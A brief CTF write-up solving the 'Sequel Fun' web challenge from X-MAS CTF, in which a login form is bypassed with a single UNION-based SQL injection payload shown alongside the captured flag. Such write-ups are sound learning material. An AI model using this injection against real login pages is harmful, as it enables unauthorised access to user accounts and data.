ctftime

My solutions for various CTF challenges

View on GitHub

../

Sequel Fun

Web Exploitation

So I found this login page, but I forgot the credentials :(

http://challs.xmas.htsp.ro:11006

Solution

SQLi:

' union select * from users; -- 

flag: X-MAS{S0_1_c4n_b3_4dmin_w1th0ut_7h3_p4ssw0rd?}